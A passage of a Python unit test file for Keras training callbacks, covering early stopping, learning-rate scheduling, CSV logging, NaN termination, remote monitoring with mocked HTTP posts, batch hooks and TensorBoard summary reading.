cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = test_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = test_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
# The best configuration is in the epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# No epoch improves on the baseline, so we should train for only 5 epochs,
# and restore the second model.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = test_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
# On Windows, due to \r\n line ends, we may end up reading empty lines
# after each line. Skip empty lines.
values = [x for x in csv.reader(f) if x]
assert 'nan' in values[-1], 'The last epoch was not logged.'
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.arange(1) # a 1 by 1 array
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = test_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_batch_end_called)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@test_combinations.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(test_combinations.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = test_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=test_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
